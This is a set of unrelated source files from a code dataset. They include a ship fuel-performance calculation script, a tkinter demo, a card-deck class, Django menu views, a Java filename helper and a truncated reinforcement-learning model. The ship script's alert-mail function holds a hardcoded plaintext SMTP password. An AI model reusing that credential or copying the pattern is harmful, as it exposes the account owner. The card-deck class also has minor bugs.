conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME,noondata.c.STW]).where(noondata.c.Vessel_Name=='PHU')).fetchall()\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(noondata.c.UID==83982)).fetchall()\n # noon_parameter = conn.execute(select([noondata.c.Vessel_Name,noondata.c.SOG,noondata.c.DRAFT_AFT,noondata.c.DRAFT_FWD,noondata.c.DISPLACEMENT,noondata.c.RPM,noondata.c.Power_corrected,noondata.c.WindDirection,noondata.c.WindSpeed_kn,noondata.c.COURSE_AT_SEA,noondata.c.UID,noondata.c.FUEL_M_E_HS,noondata.c.FUEL_M_E_LS,noondata.c.FUEL_M_E_MDO,noondata.c.FUEL_M_E_MGO_HS,noondata.c.FUEL_M_E_MGO_LS,noondata.c.M_E_FUEL_ONLY_STEAMING_TIME]).where(and_(noondata.c.mail_date < datetime.date(2019,8,23),noondata.c.Vessel_Name=='PHU'))).fetchall()\n print(\"noondata:\",noon_parameter)\n # ves_mis=['PSL','PMA','PMU','PYN']\n ves_dtls_lst =[]\n validation_parameters = conn.execute(select([validation.c.Parameter,validation.c.Minimum_value,validation.c.Maximum_value])).fetchall()\n ves_dtls = conn.execute(select([vessel_details.c.id]).distinct())\n print(\"vessel_details:\",ves_dtls)\n for ves in ves_dtls:\n ves_dtls_lst.append(ves[0])\n print(\"ves_dtls_lst:\",ves_dtls_lst)\n \n for validation_param in validation_parameters:\n validation_dct[validation_param[0]+\"_min\"]=validation_param[1]\n validation_dct[validation_param[0]+\"_max\"]=validation_param[2]\n\n for obj_noon in noon_parameter:\n print(\"obj_noon:\",obj_noon)\n\n obj_noon_chk=list(obj_noon)\n obj_noon_chk=obj_noon_chk[:-1]\n print(\"rslt:obj\",obj_noon_chk)\n # if(obj_noon[0] not in ves_dtls_lst):\n # \tcontinue\n # if obj_noon[0] in ves_mis:\n # \tcontinue\n\n if obj_noon[0] not in ves_dtls_lst:\n print(\"vessel not in ves_dtls_lst\")\n continue\n\n try:\n for chk_noon in obj_noon_chk:\n print(\"check noon:\",chk_noon)\n # print(\"uidd:\",chk_noon[10])\n if chk_noon is None:\n print(\"check noon is none....\")\n raise Exception()\n except Exception as e:\n print(\"exception:\",e)\n continue\n\n lst_obj_noon = list(obj_noon)\n \n \n mcr=conn.execute(select([vessel_details.c.MCR ]).where(vessel_details.c.id==obj_noon[0])).fetchall()\n \n power_min=float(validation_dct[\"Power_min\"])*float(mcr[0][0])\n power_max=float(validation_dct[\"Power_max\"])*float(mcr[0][0])\n print(\"UID:\",obj_noon[10])\n print(\"vessel_name:\",obj_noon[0])\n\n if( ( (obj_noon[2]>=float(validation_dct[\"Draft_min\"]))&(obj_noon[2]<=float(validation_dct[\"Draft_max\"]))) &( (obj_noon[3]>=float(validation_dct[\"Draft_min\"]))&(obj_noon[3]<=float(validation_dct[\"Draft_max\"]))) &( (obj_noon[6]>=float(power_min))&(obj_noon[6]<=float(power_max))) &( (obj_noon[7]>=float(validation_dct[\"WindDirection_min\"]))&(obj_noon[7]<=float(validation_dct[\"WindDirection_max\"]))) &( (obj_noon[8]>=float(validation_dct[\"WindSpeed_kn_min\"]))&(obj_noon[8]<=float(validation_dct[\"WindSpeed_kn_max\"]))) &( (obj_noon[9]>=float(validation_dct[\"COURSE_AT_SEA_min\"]))&(obj_noon[9]<=float(validation_dct[\"COURSE_AT_SEA_max\"]))) &((obj_noon[16]>=float(validation_dct[\"M_E_FUEL_ONLY_STEAMING_TIME_min\"]))&(obj_noon[16]<=float(validation_dct[\"M_E_FUEL_ONLY_STEAMING_TIME_max\"]))) ) :\n #iso_parameter=metadata.tables['ISOPARAMETERnew']\n iso_vesls = conn.execute(select([iso_parameter.c.Vessel_id])).fetchall()\n \n #print(\"vessels in iso:\",iso_vesls)\n print(\"after validation\")\n if obj_noon[1] and obj_noon[4] and obj_noon[6]:\n for iso_ves in iso_vesls:\n if not obj_noon[0] in iso_ves[0]: \n continue\n dct_isoparams_db = {}\n lst_true_wind_speed = []\n iso_params = conn.execute(select([iso_parameter.c.design_draft,iso_parameter.c.breadth,iso_parameter.c.ref_area,iso_parameter.c.ALV,iso_parameter.c.HC,\tiso_parameter.c.CMC,iso_parameter.c.AOD,iso_parameter.c.HBR,iso_parameter.c.AXV,iso_parameter.c.LOA,iso_parameter.c.LBP,iso_parameter.c.B,\tiso_parameter.c.SC_draft,iso_parameter.c.anemoht,iso_parameter.c.z_ref,iso_parameter.c.a_b,iso_parameter.c.b_b,iso_parameter.c.a_sc,iso_parameter.c.\tb_sc,iso_parameter.c.disp_b,iso_parameter.c.disp_sc,iso_parameter.c.f1,iso_parameter.c.f2,iso_parameter.c.k,iso_parameter.c.disp_16,iso_parameter.c.Speedcoef]).where(iso_parameter.c.Vessel_id ==obj_noon[0] )).fetchall()\n draft_mean = (obj_noon[2] + obj_noon[3])/2\n iso_b = float(iso_params[0][11])\n iso_design_draft = float(iso_params[0][0])\n iso_breadth = float(iso_params[0][1])\n iso_ref_area = float(iso_params[0][2])\n iso_lbp = float(iso_params[0][10])\n iso_anemoht = float(iso_params[0][13])\n iso_z_ref = float(iso_params[0][14])\n iso_loa = float(iso_params[0][9])\n iso_aod = float(iso_params[0][6])\n iso_cmc = float(iso_params[0][5])\n iso_a_b = float(iso_params[0][15])\n iso_b_b = float(iso_params[0][16])\n iso_a_sc = float(iso_params[0][17])\n iso_b_sc = float(iso_params[0][18])\n iso_disp_b = float(iso_params[0][19])\n iso_disp_sc = float(iso_params[0][20])\n air_density = 1.25\n iso_noon_sog = obj_noon[1]\n iso_noon_power = float(obj_noon[6])\n iso_noon_displacement = obj_noon[4]\n iso_deltat = float(iso_params[0][12]) - draft_mean\n print(\"draft_mean:\",draft_mean)\n print(\"iso_deltat:\",iso_deltat)\n rad_to_deg = float(3.14/180)\n iso_area = float(iso_params[0][8]) + (iso_deltat*iso_b)\n print(\"iso_area:\",iso_area)\n iso_fuel_me_hs = float(obj_noon[11])\n\n try:\n iso_fuel_me_ls = float(obj_noon[12])\n except Exception as TypeError:\n iso_fuel_me_ls = 0\n \n iso_fuel_me_mdo = float(obj_noon[13])\n iso_fuel_me_mgo_hs = float(obj_noon[14])\n iso_fuel_me_mgo_ls = float(obj_noon[15])\n iso_f1 = float(iso_params[0][21])\n iso_f2 = float(iso_params[0][22])\n iso_k = float(iso_params[0][23])\n iso_disp_16 = float(iso_params[0][24])\n iso_speedcoef = float(iso_params[0][25])\n iso_me_fuel_only_steaming_time = float(obj_noon[16])\n if(obj_noon[17]!='NULL' and obj_noon[17]!=0 and obj_noon[17] is not None ):\n print(\"obj_noon[17]:\",obj_noon[17],type(obj_noon[17]))\n iso_noon_stw=float(obj_noon[17])\n else:\n iso_noon_stw=iso_noon_sog\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db['FO_per_24Hrs'] = (iso_fuel_me_hs + iso_fuel_me_ls + iso_fuel_me_mdo + iso_fuel_me_mgo_hs + iso_fuel_me_mgo_ls)*24/iso_me_fuel_only_steaming_time\n dct_isoparams_db['SFOC'] = (dct_isoparams_db['FO_per_24Hrs']*10**6)/(24*iso_noon_power)\n \n \n # import pdb \n # pdb.set_trace()\n if iso_params:\n if iso_breadth and iso_breadth and iso_design_draft:\n draft_change = iso_design_draft - float(draft_mean)\n projarea_i = iso_breadth + iso_breadth + float(draft_change)\n \n if iso_params[0][8] and iso_b and iso_params[0][12] and iso_params[0][7] and iso_params[0][3] and iso_params[0][10] and iso_params[0][4]:\n iso_axv = iso_area\n print(\"iso_axv:\",iso_axv)\n iso_hbr = float(iso_params[0][7]) + iso_deltat\n iso_alv = float(iso_params[0][3]) + iso_lbp * iso_deltat\n iso_hci = (float(iso_params[0][3])*float(iso_params[0][4])+(0.5* iso_lbp * iso_deltat**2))/(float(iso_params[0][3])+(iso_lbp * iso_deltat)) \n\n if obj_noon[7] is None or obj_noon[1] is None or iso_params[0][12] is None or obj_noon[8] is None or obj_noon[9] is None or obj_noon[7] == '' :\n continue\n lst_true_wind_speed = true_wind_speed_calc(float(obj_noon[8]),float(obj_noon[1]),float(obj_noon[7]),float(obj_noon[9]),rad_to_deg)\n dct_isoparams_db[\"True_wind_speed\"] = lst_true_wind_speed[0]\n dct_isoparams_db[\"True_wind_dir\"] = lst_true_wind_speed[1]\n dct_isoparams_db[\"condn\"] = lst_true_wind_speed[2]\n dct_isoparams_db[\"numeratorcase\"] = lst_true_wind_speed[3]\n vwtref = true_wind_ref(lst_true_wind_speed[0],iso_anemoht,iso_z_ref,float(iso_params[0][12]),draft_mean,iso_axv,iso_b)\n lst_rel_wind_speed = relativewindspeed(vwtref,obj_noon[1],lst_true_wind_speed[1],obj_noon[9],rad_to_deg)\n dct_isoparams_db[\"ref_power\"] = (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - ((((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - (((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc))) * ((iso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))\n dct_isoparams_db[\"ref_fuel\"] = (iso_f1*dct_isoparams_db[\"ref_power\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power\"])+iso_k\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"fuel_loss\"] = (dct_isoparams_db['FO_per_24Hrs']-dct_isoparams_db[\"ref_fuel\"])*100/dct_isoparams_db[\"ref_fuel\"]\n \n rel_win_dir_corr = lst_rel_wind_speed[1]\n print(\"rel_win_dir_corr:\",rel_win_dir_corr)\n rel_win_speed_corr = lst_rel_wind_speed[0]\n print(\"rel_win_speed_corr:\",rel_win_speed_corr)\n dct_isoparams_db['Relative_wind_speed'] = rel_win_speed_corr\n dct_isoparams_db['Relative_wind_direction'] = rel_win_dir_corr\n \n \n ########....Fujiwara method for finding CAA.#####\n isoData_CLF_90_180 = -0.018 + 5.091 * (float(iso_b)/iso_loa) + (-10.367 * (iso_hci/iso_loa)) + (3.011 * (iso_aod/iso_loa**2)) + (0.341 * iso_axv/iso_b\t**2)\n isoData_CXLI_90_180 = 1.901 + (-12.727 * iso_alv)/(iso_loa *iso_hbr) + (-24.407 * iso_axv/iso_alv) + (40.310 * (iso_b/iso_loa)) + ((5.481 * iso_axv)/(\tiso_b*iso_hbr))\n isoData_CALF_90_180 = 0.314 + ((1.117 * iso_aod) / iso_alv)\n isoData_CLF_0_90 = 0.922 + ((-0.507 * iso_alv)/(iso_loa * iso_b)) + (-1.162 * iso_cmc/iso_loa)\n isoData_CXLI_0_90 = -0.458 + (-3.245 *((iso_alv)/(iso_loa * iso_hbr))) + (2.313 * (iso_axv)/(iso_b * iso_hbr))\n isoData_CALF_0_90 = 0.585 + (0.906 * (iso_aod/iso_alv)) + (-3.239 * iso_b/iso_loa)\n \n #if cond_n to be correct\n if rel_win_dir_corr >= 0 and rel_win_dir_corr < 90:\n isoData_wind_coeff = isoData_CLF_0_90 * math.cos(math.radians(rel_win_dir_corr)) + isoData_CXLI_0_90 *(math.sin(math.radians(rel_win_dir_corr)) - (0.5 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr)))**2)) * math.sin(math.radians(rel_win_dir_corr)) *\t math.cos(math.radians(rel_win_dir_corr))+ isoData_CALF_0_90 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr))**3)\n print(\"isoData_wind_coeff:\",isoData_wind_coeff)\n \n elif rel_win_dir_corr > 90 and rel_win_dir_corr <= 180:\t\t\t\t\n lst_rel_wind_speed = relativewindspeed(vwtref,obj_noon[1],lst_true_wind_speed[1],obj_noon[9],rad_to_deg)\n \n dct_isoparams_db[\"ref_power\"] = (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - ((((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)) - (((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc))) * ((iso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))\n dct_isoparams_db[\"ref_fuel\"] = (iso_f1*dct_isoparams_db[\"ref_power\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power\"])+iso_k\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"fuel_loss\"] = (dct_isoparams_db['FO_per_24Hrs']-dct_isoparams_db[\"ref_fuel\"])*100/dct_isoparams_db[\"ref_fuel\"]\n\n rel_win_dir_corr = lst_rel_wind_speed[1]\n rel_win_speed_corr = lst_rel_wind_speed[0]\n dct_isoparams_db['Relative_wind_speed'] = rel_win_speed_corr\n dct_isoparams_db['Relative_wind_direction'] = rel_win_dir_corr\n \n \n ########....Fujiwara method for finding CAA.#####\n isoData_wind_coeff = isoData_CLF_90_180 * math.cos(math.radians(rel_win_dir_corr)) + isoData_CXLI_90_180 * (math.sin(math.radians(rel_win_dir_corr\t)) - (0.5 * math.sin(math.radians(rel_win_dir_corr)) *(math.cos(math.radians(rel_win_dir_corr)))**2)) * math.sin(math.radians(rel_win_dir_corr)) * math.cos(math.radians(rel_win_dir_corr)) + isoData_CALF_90_180 * math.sin(math.radians(rel_win_dir_corr)) * (math.cos(math.radians(rel_win_dir_corr)))**3\n \n elif rel_win_dir_corr == 90:\n isoData_wind_coeff = (0.5 * (isoData_CLF_0_90 * math.cos(math.radians(80)) + isoData_CXLI_0_90 * (math.sin(math.radians(80)) - 0.5 * math.sin(math\t.radians(80)) * (math.cos(math.radians(80)))**2) * math.sin(math.radians(80)) * math.cos(math.radians(80)) + isoData_CALF_0_90 * math.sin(math\t.radians(80)) * (math.cos(math.radians(80)))**3 + isoData_CLF_90_180 * math.cos(math.radians(100)) + isoData_CXLI_90_180 * (math.sin(math.\tradians(100)) - 0.5 * math.sin(math.radians(100)) * (math.cos(math.radians(100)))**2) * math.sin(math.radians(100)) * math.cos(math.radians(100)) + isoData_CALF_90_180 * math.sin(math.radians(100)) * (math.cos(math.radians(100)))**3))\n \n \n isoData_wind_coeff_heading = (0.922 + (-0.507 * iso_alv)/( iso_loa * iso_b) + (-1.162 * iso_cmc/ iso_loa))*math.cos(math.radians(0))\n dct_isoparams_db['CAA'] = isoData_wind_coeff\n print(\"isoData_wind_coeff_heading:\",isoData_wind_coeff_heading)\n \n ##### Corrected Power and Reference Speed #####\n isoData_res_resistance = (.5 * air_density * iso_axv * rel_win_speed_corr**2 * isoData_wind_coeff) - (.5 * air_density * iso_axv * (iso_noon_sog*0.5144)**2 * isoData_wind_coeff_heading)\n print(\"isoData_res_resistance:\",isoData_res_resistance)\n dct_isoparams_db['RW'] = isoData_res_resistance\n isoData_corr_power = iso_noon_power - (isoData_res_resistance * iso_noon_stw*0.5144 /700)\n dct_isoparams_db['Corrected_Power'] = isoData_corr_power\n dct_isoparams_db[\"draft_pow\"] = isoData_corr_power+((((1/iso_a_sc) * iso_noon_stw)**(1/iso_b_sc)) - (((1/iso_a_b) * iso_noon_stw)**(1/iso_b_b)))/(iso_disp_sc-iso_disp_b)*(iso_disp_16-iso_noon_displacement)\n \n # print(\"csv columns:\",csv_columns)\n fo_nor_dct={} \n \n fo_nor_dct['REPORT_DATE_TIME']=obj_noon[18]\n fo_nor_dct['Vessel_Name']=obj_noon[0]\n fo_nor_dct['SOG']=iso_noon_sog\n dct_isoparams_db[\"draft_sp_pow\"] = dct_isoparams_db[\"draft_pow\"]*(12/iso_noon_stw)**iso_speedcoef\n fo_nor_dct['draft_sp_pow']=dct_isoparams_db[\"draft_sp_pow\"]\n\n dct_isoparams_db['fo_nor'] = (iso_f1*dct_isoparams_db[\"draft_sp_pow\"]**2)+(iso_f2*dct_isoparams_db[\"draft_sp_pow\"])+iso_k\n fo_nor_dct['fo_nor'] = dct_isoparams_db['fo_nor']\n fo_nor_lst=lst.append(fo_nor_dct.copy())\n print(\"fo_nor_dct:\",fo_nor_dct)\n print(\"fo_nor_lst:\",lst)\n\n \n dct_isoparams_db['fo_model'] = (iso_f1*iso_noon_power**2)+(iso_f2*iso_noon_power)+iso_k\n dct_isoparams_db[\"sfoc_model\"] = (dct_isoparams_db['fo_model']*10**6)/(24*iso_noon_power)\n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db['sfoc_deviation'] = (dct_isoparams_db['SFOC'] - dct_isoparams_db[\"sfoc_model\"])*100/dct_isoparams_db[\"sfoc_model\"]\n\n dct_isoparams_db[\"ref_power_corrected\"] = dct_isoparams_db[\"ref_power\"] - (isoData_res_resistance * iso_noon_stw*0.5144 /700)\n dct_isoparams_db[\"ref_FO_corrected\"] =(iso_f1*dct_isoparams_db[\"ref_power_corrected\"]**2)+(iso_f2*dct_isoparams_db[\"ref_power_corrected\"])+iso_k\n \n if(iso_me_fuel_only_steaming_time!=0 and iso_me_fuel_only_steaming_time < 30 ):\n dct_isoparams_db[\"Propulsive_eff\"] = (dct_isoparams_db[\"ref_FO_corrected\"]*100)/dct_isoparams_db['FO_per_24Hrs'] \n dct_isoparams_db[\"speed_performance\"] = (dct_isoparams_db[\"ref_power_corrected\"]*100)/iso_noon_power\n\n isoData_refcurv_speed = ((iso_a_b * isoData_corr_power**iso_b_b - ((iso_a_b * isoData_corr_power**iso_b_b) - (iso_a_sc * isoData_corr_power**iso_b_sc)) * ((\tiso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))))\n print(\"isoData_corr_power:\",isoData_corr_power)\n if(isoData_corr_power > 0):\n isoData_refcurv_speed = ((iso_a_b * isoData_corr_power**iso_b_b - ((iso_a_b * isoData_corr_power**iso_b_b) - (iso_a_sc * isoData_corr_power**iso_b_sc)) * ((\tiso_noon_displacement-iso_disp_b) / (iso_disp_sc-iso_disp_b))))\n print(\"isoData_refcurv_speed:\",isoData_refcurv_speed)\n if isoData_refcurv_speed == 0:\n continue\n dct_isoparams_db['Ref_speed'] = isoData_refcurv_speed\n isoData_perf_value = (iso_noon_stw-isoData_refcurv_speed) * 100/isoData_refcurv_speed\n print(\"P_I:\",isoData_perf_value)\n dct_isoparams_db['P_I'] = isoData_perf_value\n update_noon_iso = update(noondata).where(noondata.c.UID == obj_noon[10])\n update_noon_iso = update_noon_iso.values(dct_isoparams_db)\n # conn.execute(update_noon_iso)\n \n\n csv_columns = fo_nor_dct.keys()\n print(\"csv_columns:\",csv_columns)\n try:\n with open('/home/lekha/Documents/mtm_windspeed/ISO/test.csv', 'w') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\n writer.writeheader()\n for data in lst:\n writer.writerow(data)\n except IOError:\n print(\"I/O error\")\ndef true_wind_speed_calc(wind_speed,speed,wind_dir,cog,rad_to_deg):\n # import pdb \n # pdb.set_trace()\n lst_return = []\n wind_speed = wind_speed*0.5144\n speed = speed*0.5144\n vwt = math.sqrt(wind_speed*wind_speed + speed*speed - (2 * wind_speed * speed * math.cos(math.radians(wind_dir))))\n lst_return.append(vwt)\n x = wind_speed* math.cos(math.radians(wind_dir+cog))\n y = speed*math.cos(math.radians(cog))\n cond_n = (wind_speed* math.cos(math.radians(wind_dir+cog))) -(speed*math.cos(math.radians(cog)))\n cond_n = round(cond_n,4)\n numeratorcase = float((wind_speed*math.sin(math.radians(wind_dir+cog)))-(speed*math.sin(math.radians(cog))))\n wind_dir = math.degrees(math.atan2(numeratorcase,cond_n))\n truewinddir = abs(math.degrees(math.atan2(numeratorcase,cond_n)))\n \n #zero_flg = abs(numeratorcase/cond_n)\n #print(\"zero_flg1\",zero_flg)\n \"\"\"if cond_n >= 0:\n truewinddir = math.degrees(math.atan2(numeratorcase,cond_n))\n else:\n truewinddir = (math.degrees(math.atan2(numeratorcase,cond_n)))+180\"\"\"\n lst_return.append(truewinddir)\n lst_return.append(cond_n)\n lst_return.append(numeratorcase)\n return(lst_return)\n\n\ndef alert_mail(str_error):\n\n \n msg = MIMEMultipart()\n # storing the senders email address\n fromaddr = config('frmaddrs')\n msg['From'] = fromaddr\n # storing the receivers email address script-status-alerts@xship.in\n toaddrs = config('toaddrs')\n msg['To'] = toaddrs\n # storing the subject\n msg['Subject'] = \"MTM NOONDATA iso script status alert\"\n body = \"\"\n body = \"MTM NOONDATA ISO calculation not completed due to the error :-\\n\\n\"+str(str_error)\n \n\n msg.attach(MIMEText(body, 'plain'))\n # creates SMTP session\n s = smtplib.SMTP('outlook.office365.com', 587)\n # start TLS for security\n s.starttls()\n # Authentication\n s.login(fromaddr, \"navgathi@12*\")\n # Converts the Multipart msg into a string\n text = msg.as_string()\n\n s.sendmail(fromaddr,[toaddrs], text)\n s.quit()\n\n\ndef true_wind_ref(twind,za,zref,tref,t,Aref,B):\n\n # import pdb \n # pdb.set_trace()\n deltat = tref-t\n zaref=za-t\n Area=Aref+deltat*B\n a = Aref*(zref+deltat)\n b = 0.5*B*deltat**2\n zref=(Aref*(zref+deltat)+0.5*B*deltat**2)/Area\n z_za = (zref/zaref)\n vwtref = twind*(float(z_za)**float(1/7))\n return vwtref\n\ndef relativewindspeed(vwtref,speed,truewinddir,cog,rad_to_deg):\n # import pdb \n # pdb.set_trace()\n lst_result = []\n windspeed=vwtref#*0.5144\n speed=speed*0.5144\n vwrref = math.sqrt(windspeed**2 + speed**2 + (2 * windspeed * speed * math.cos(math.radians (truewinddir-cog))))\n lst_result.append(vwrref)\n cond_n = (windspeed*math.cos(math.radians(truewinddir-cog)))+speed\n numeratorcase = windspeed*math.sin(math.radians(truewinddir-cog))\n relwinddir = abs(math.degrees(math.atan2(numeratorcase,cond_n)))\n \"\"\"if cond_n>=0:\n relwinddir = math.degrees(math.atan2(cond_n,numeratorcase))\n else:\n relwinddir = (math.degrees(math.atan2(cond_n,numeratorcase)))+180\"\"\"\n\n lst_result.append(relwinddir)\n return lst_result\n\nif __name__ == \"__main__\":\n # iso_data_fetch_calc()\n try:\n iso_data_fetch_calc()\n except Exception as e:\n alert_mail(e)\n raise\n \n\n\n","sub_path":"ISO/iso_calculation_fo_nor.py","file_name":"iso_calculation_fo_nor.py","file_ext":"py","file_size_in_byte":32584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292651393","text":"from tkinter import *\r\nfrom tkinter.ttk import Combobox\r\nwindow = Tk()\r\nwindow.title(\"Hello Python\")\r\nwindow.geometry(\"400x300+10+10\")\r\nwindow.config(bg=\"Green\")\r\nvar = StringVar()\r\nvar.set(\"one\")\r\ndata=(\"one\",\"two\",\"three\",\"four\")\r\ncb=Combobox(window,values=data)\r\ncb.place(x=60,y=150)\r\nlb=Listbox(window,height=5,selectmode='multiple')\r\nfor num in data:\r\n lb.insert(END,num)\r\nlb.place(x=250,y=150)\r\nv0=IntVar()\r\nv0.set(1)\r\nr1=Radiobutton(window,text=\"male\",variable=v0,value=1)\r\nr2=Radiobutton(window,text=\"female\",variable=v0,value=2)\r\nr1.place(x=100,y=100)\r\nr2.place(x=180,y=100)\r\nv1=IntVar()\r\nv2=IntVar()\r\nC1 = Checkbutton(window,text=\"cricket\",variable=v1)\r\nC2 = Checkbutton(window,text=\"Hockey\",variable=v2)\r\nbtn=Button(window,text=\"Submit\",fg=\"Blue\",font=34)\r\nbtn.place(x=90,y=200)\r\nlbl=Label(window,text=\"Here We Can Show Label\",fg=\"Red\",font=45)\r\nlbl.place(x=30,y=40)\r\nwindow.mainloop()","sub_path":"Selection.py","file_name":"Selection.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289294192","text":"from card import Card\nfrom collections import deque\nimport random\n\nclass DeckOfCards( Card ):\n # the plan here is to make a new card object and add it to the deck\n deck = deque( maxlen=52 )\n removed = deque()\n\n def __init__( self, shuffle=False ): \n for i in Card.suits:\n for j in range( 1,14 ):\n self.deck.append( Card( i, j ))\n if shuffle:\n self.deck.shuffle()\n def __repr__( self ):\n pass\n \n def __str__( self ):\n s = \"\" # string to be built which will be returned\n \n for i in self.deck:\n s += str( i ) + \"\\n\"\n return s\n\n def shuffle( self ):\n for i in range( len( self.deck )):\n r = random.randint( 0, 52 )\n self.deck[i], self.deck[r] = self.deck[r], self.deck[i]\n\n\n def draw( self ):\n if( len( self.deck ) > 0 ):\n print( self.deck.pop() ) \n # if we have a player class we shouldn't print this, but leave it to the player to print this out\n else:\n print( \"Out of cards!\" )\n\n","sub_path":"deckofcards.py","file_name":"deckofcards.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128015328","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#update:2014-11-12 by 250305240@qq.com\n\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.shortcuts import render_to_response,RequestContext\nfrom django.contrib.auth.decorators import login_required\nfrom webapp.common.CommonPaginator import SelfPaginator\nfrom webapp.view.admin.permission import PermissionVerify\nfrom webapp.view.admin.menu_forms import MenuListForm\nfrom webapp.models import Menu\n\n@login_required\n@PermissionVerify()\ndef AddMenu(request):\n if request.method == \"POST\":\n form = MenuListForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('listmenuurl'))\n else:\n form = MenuListForm()\n\n kwvars = {\n 'form':form,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.add.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef ListMenu(request):\n mList = Menu.objects.all()\n\n #分页功能\n lst = SelfPaginator(request,mList, 20)\n\n kwvars = {\n 'lPage':lst,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.list.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef EditMenu(request,ID):\n iMenu = Menu.objects.get(id=ID)\n\n if request.method == \"POST\":\n form = MenuListForm(request.POST,instance=iMenu)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('listmenuurl'))\n else:\n form = MenuListForm(instance=iMenu)\n\n kwvars = {\n 'ID':ID,\n 'form':form,\n 'request':request,\n }\n\n return render_to_response('UserManage/menu.edit.html',kwvars,RequestContext(request))\n\n@login_required\n@PermissionVerify()\ndef DeleteMenu(request,ID):\n Menu.objects.filter(id = ID).delete()\n\n return HttpResponseRedirect(reverse('listmenuurl'))\n","sub_path":"webapp/view/admin/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"583032385","text":"from subprocess import Popen\n\nerr = open('error.txt', 'w+')\np = Popen(['javac', 'Main.java'], stderr=err)\np.wait()\nerr.close()\n\nif p.returncode != 0:\n with open('error.txt', \"r\") as f:\n t = f.readline()\n s = \"should be declared in a file named\"\n pos = t.find(s)\n if pos == -1:\n print(\"Compilation Error\") # this happens if we did not found message \"should be\n # declared in a file named\" in first line of error message\n else:\n new_name = t[pos + len(s) + 1:].strip()\n print(\"File should be named:\", new_name)\n","sub_path":"java/GetJavaPublicClassName.py","file_name":"GetJavaPublicClassName.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204995367","text":"from math import exp\nimport numpy\nimport json\nfrom itertools import product\nfrom scipy.stats.distributions import beta\n\nclass Two_Stage_Model(object):\n def __init__(self,alpha1,alpha2,lam,B1,B2,W,p):\n self.alpha1 = alpha1\n self.alpha2 = alpha2\n self.lam = lam\n self.B1= B1\n self.B2 = B2\n self.W = W\n self.p = p\n # stage action possibilities\n self.stage_action_list = {0: (0,1), 1: (2,3), 2: (4,5)}\n # transition counts\n self.transition_counts = {(0,1):0, (0,2):0, (1,1):0, (1,2):0}\n # initialize Q values\n self.Q_TD_values = numpy.ones((3,6))*0\n self.Q_MB_values = numpy.ones((3,6))*0\n self.sum_neg_ll = None\n\n def updateQTD(self,r,s1,a1,s2=None,a2=None,alpha=.05):\n if s2 == None:\n delta = r - self.Q_TD_values[s1,a1]\n else:\n delta = r + self.Q_TD_values[s2,a2] - self.Q_TD_values[s1,a1]\n self.Q_TD_values[s1,a1] += alpha*delta\n return delta\n \n def updateQMB(self,T):\n self.Q_MB_values[1:3,:] = self.Q_TD_values[1:3,:]\n for a in self.stage_action_list[0]:\n self.Q_MB_values[0,a] = T[(a,1)] * numpy.max(self.Q_TD_values[1,2:4]) + \\\n T[(a,2)] * numpy.max(self.Q_TD_values[2,4:6])\n \n def trialUpdate(self,s1,s2,a1,a2,r,alpha1,alpha2,lam):\n # update TD values\n delta1 = 